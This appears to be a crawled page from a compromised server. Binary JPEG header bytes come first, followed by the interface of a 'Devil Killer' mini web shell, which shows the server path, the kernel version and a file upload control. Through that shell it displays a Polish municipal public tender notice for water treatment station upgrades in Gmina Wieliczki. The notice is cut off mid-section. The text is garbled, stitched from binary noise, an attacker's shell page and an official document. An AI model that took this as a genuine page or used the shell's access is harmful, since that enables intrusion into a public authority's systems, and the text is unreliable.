JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230314/0013541001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Poprawa infrastruktury wodociągowej w Gminie Wieliczki polegającej na modernizacji stacji uzdatniania wody w miejscowości Niedźwiedzkie oraz w miejscowości Kleszczewo w formule zaprojektuj i wybuduj </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wieliczki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 790671337</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Lipowa 53</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wieliczki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">19-404</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL623 - Ełcki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@wieliczki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">wieliczki.bipgmina.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> administracja samorządowa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Poprawa infrastruktury wodociągowej w Gminie Wieliczki polegającej na modernizacji stacji uzdatniania wody w miejscowości Niedźwiedzkie oraz w miejscowości Kleszczewo w formule zaprojektuj i wybuduj </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-54a14f43-c19c-11ed-b311-9aae6ad31be8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00135410</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00006464/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Poprawa infrastruktury wodociągowej w Gminie Wieliczki polegającej na modernizacji stacji uzdatniania wody w miejscowości Niedźwiedzkie oraz w miejscowości Kleszczewo</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ug_wieliczki/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/ug_wieliczki/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">: 1. Komunikacja w postępowaniu o<br/>udzielenie zamówienia, w tym składanie ofert w postępowaniu, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń<br/>między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej.<br/>2. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 p.z.p., podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie<br/>podmiotu udostępniającego zasoby oraz inne wymagane dokumenty sporządza się w postaci elektronicznej, w ogólnie dostępnych<br/>formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt . Ofertę, a także oświadczenie o jakim mowa w art.<br/>125 ust. 1 p.z.p składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym.<br/>3. W postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu platformy zakupowej, która<br/>dostępna jest pod adresem: https://platformazakupowa.pl/pn/ug_wieliczki/proceedings<br/>4. Komunikacja między Zamawiającym a Wykonawcami w zakresie:<br/>- przesyłania Zamawiającemu pytań do treści SWZ<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia podmiotowych środków dowodowych;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia/ poprawienia/ uzupełnienia oświadczenia, o którym mowa w art.<br/>125 ust. 1, podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dotyczących treści oświadczenia, o którym mowa w<br/>art. 125 ust. 1 lub złożonych podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu;<br/>- przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dot. treści przedmiotowych środków dowodowych;<br/>- przesłania odpowiedzi na inne wezwania Zamawiającego wynikające z ustawy Pzp;<br/>- przesyłania wniosków, informacji, oświadczeń Wykonawcy;<br/>- przesyłania odwołania/ inne odbywa się za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do<br/>zamawiającego”.<br/>5. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do Zamawiającego” po których pojawi się<br/>komunikat, że wiadomość została wysłana do Zamawiającego.<br/>6. Zamawiający określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych- MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>8. Zamawiający będzie przekazywał Wykonawcom informacje za pośrednictwem platformazakupowa.pl. Odpowiedzi na pytania,<br/>zmiany specyfikacji, zmiany terminu składania i otwarcia ofert będą zamieszczone na platformie w sekcji “Komunikaty”.<br/>Korespondencja, której adresatem jest konkretny Wykonawca, będzie przekazywana za pośrednictwem platformazakupowa.pl do<br/>konkretnego Wykonawcy.<br/>9. Instrukcje korzystania z platformazakupowa.pl dotyczące logowania, składania wniosków o wyjaśnienie treści SWZ, składania<br/>ofert oraz innych czynności podejmowanych w postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje<br/>dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>10. Wykonawca po upływie terminu do składania ofert nie może skutecznie dokonać zmiany ani wycofać złożonej oferty.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE<br/>(ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że<br/>a) Administratorem Pani/Pana danych osobowych jest Gmina Wieliczki, reprezentowana przez Wójta Gminy, ul. Lipowa 53, 19-404<br/>Wieliczki, tel. 87 621-90-60 email: sekretariat@wieliczki.pl, faks 87 5214277;<br/>b) w Urzędzie Gminy w Wieliczkach został wyznaczony Inspektor ochrony danych osobowych,<br/>z którym można skontaktować się za pomocą poczty elektronicznej: iod@wieliczki.pl ;<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie przedmiotowego zamówienia publicznego, prowadzonym w trybie podstawowym;<br/>d) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania;<br/>e) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem wynikającym z<br/>przepisów prawa;<br/>f) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 Ustawy, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>g) W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO<br/>6. Posiada Pani/Pan:<br/>1) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>2) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z obowiązującymi przepisami oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>3) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub<br/>prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego).Zgłoszenie żądania<br/>ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia postępowania o udzielenie zamówienia;<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>7. Nie przysługuje Pani/Panu:<br/>1) prawo do usunięcia danych osobowych w związku z art. 17 ust. 3 lit. b, d lub e RODO;<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; na podstawie art. 21 RODO prawo sprzeciwu,<br/>wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c<br/>RODO;<br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">G.II.271.2.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: <br/>1) „Przebudowa stacji uzdatniania wody w miejscowości Niedźwiedzkie w systemie zaprojektuj i wybuduj” w ramach Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych edycja druga.<br/>a) Zakres robót części budowlanej obejmuje: <br/>− remont budynku technologicznego, <br/>− budowę fundamentu zbiorników retencyjnych wraz z komorą zasuw, <br/>− rozbiórka wiaty śmietnikowej, <br/>− zagospodarowanie terenu. <br/>b) Zakres robót części sanitarnej obejmuje: <br/>− budowę zewnętrznych i wewnętrznych instalacji technologicznych, wod-kan, wentylacyjnych i grzewczych, <br/>− montaż dwóch stalowych nadziemnych zbiorników retencyjnych wody uzdatnionej, − montaż pomp głębinowych, pionów tłocznych oraz nadziemnych obudów dla 2 studni, <br/>− przebudowę sieci wodociągowej na terenie ujęcia, <br/>− montaż układu uzdatniania wody wraz z monitoringiem, <br/>− budowę odstojnika popłuczyn. <br/>c) Zakres robót części elektrycznej obejmuje: <br/>− wyniesienie złącza kablowo pomiarowego do ogrodzenia działki wraz z dostosowaniem mocy zamówionej do wielkości projektowanej, <br/>− budowę zewnętrznych i wewnętrznych instalacji elektrycznych zasilających, sterowniczych i oświetleniowych, <br/>− budowę instalacji odgromowych, wyrównawczych, <br/>− montaż stacjonarnego zespołu prądotwórczego wpiętego w monitoring technologii suw.<br/><br/>Szczegółowy zakres prac zawarty jest w dołączonym do postępowania Programie Funkcjonalno-Użytkowym.<br/><br/>2) „Przebudowa stacji uzdatniania wody w miejscowości Kleszczewo w systemie zaprojektuj i wybuduj” w ramach Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych edycja druga.<br/>a) Zakres robót części budowlanej obejmuje: <br/>− remont budynku technologicznego, <br/>− budowę fundamentu zbiorników retencyjnych wraz z komorą zasuw, <br/>− zagospodarowanie terenu: dojazdy, dojścia, ogrodzenie, zieleń. <br/>b) Zakres robót części sanitarnej obejmuje: <br/>− budowę zewnętrznych i wewnętrznych instalacji technologicznych, wod-kan, wentylacyjnych, <br/>− montaż dwóch stalowych nadziemnych zbiorników retencyjnych wody uzdatnionej, <br/>− montaż pomp głębinowych, pionów tłocznych oraz nadziemnych obudów dla 2 studni, <br/>− przebudowę sieci wodociągowej na terenie ujęcia, <br/>− montaż układu uzdatniania wody wraz z monitoringiem, <br/>− budowę odstojnika popłuczyn, przebudowę kanalizacji wód popłucznych <br/>c) Zakres robót części elektrycznej obejmuje: <br/>− ewentualne dostosowaniem mocy zamówionej do wielkości projektowanej, <br/>− budowę zewnętrznych i wewnętrznych instalacji elektrycznych zasilających, sterowniczych i oświetleniowych, <br/>− budowę instalacji odgromowych, wyrównawczych, <br/>− wykorzystanie istniejącego zespołu prądotwórczego z SZR na potrzeby przebudowywanej stacji. <br/>Szczegółowy zakres prac zawarty jest w dołączonym do postępowania Programie Funkcjonalno-Użytkowym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71354000-4 - Usługi sporządzania map</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71351910-5 - Usługi geologiczne</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowy okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia może się ubiegać wykonawca, który spełnia poniżej określone warunki udziału w postępowaniu:<br/>1) dotyczące zdolności technicznej i zawodowej, tj.: warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże,<br/>że:<br/>a) dysponuje lub będzie dysponować potencjałem kadrowym niezbędnym do realizacji zamówienia<br/>tj. dysponuje lub wykaże, że będzie dysponował w okresie przewidzianym na realizację zamówienia osobą posiadającą<br/>uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń oraz posiadającą co<br/>najmniej 3 letnie doświadczenie zawodowe w kierowaniu robotami stanowiącymi przedmiot zamówienia, przy czym osoba ta<br/>kierowała co najmniej jednym zamówieniem, w zakresie którego były: budowa, przebudowa bądź rozbudowa dróg o łącznej<br/>wartości wykonanych robót nie mniejszej niż 3.500.000,00 zł.<br/>Przez ww. uprawnienia należy rozumieć: uprawnienia budowlane, o których mowa w ustawie z dnia<br/>7 lipca 1994 r. Prawo budowlane oraz w rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie<br/>przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. poz. 831) lub<br/>odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub<br/>uznane przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia 2018r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (tj. w Dz.U. z 2023r. Nr 63, poz. 334) do pełnienia samodzielnej<br/>funkcji w budownictwie.<br/>b) w okresie ostatnich 5 lat przed upływem terminu składania ofert o udzielenie zamówienia, a jeżeli okres prowadzenia<br/>działalności jest krótszy- w tym okresie, wykonał minimum 1 robotę budowlaną o wartości nie mniejszej niż 3.500 000,00 zł<br/>brutto polegające na: budowie, przebudowie lub rozbudowie drogi.<br/>Ww. wykonane lub wykonywane prace muszą być potwierdzone dowodami określającymi, iż roboty budowlane zostały<br/>wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku<br/>dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>2) dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej – zamawiający nie stawia<br/>warunków w tym zakresie.<br/>3) dotyczący sytuacji ekonomicznej lub finansowej: warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia na sumę gwarancyjną nie mniejszą niż 3.500.000, 00 zł.<br/>4) Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia.<br/>2. Dodatkowe informacje:<br/>1) jeżeli wykonawca lub podmiot udostępniający zasoby zrealizował zadanie w trybie zaprojektuj i wybuduj, zamawiający<br/>uzna robotę budowlaną za spełniającą warunek, jeżeli robota ta będzie odpowiadała swoim zakresem i wartością wymogom<br/>określonym w pkt 1,<br/>2) jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi wykonawcami, wykaz robót budowlanych, dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych 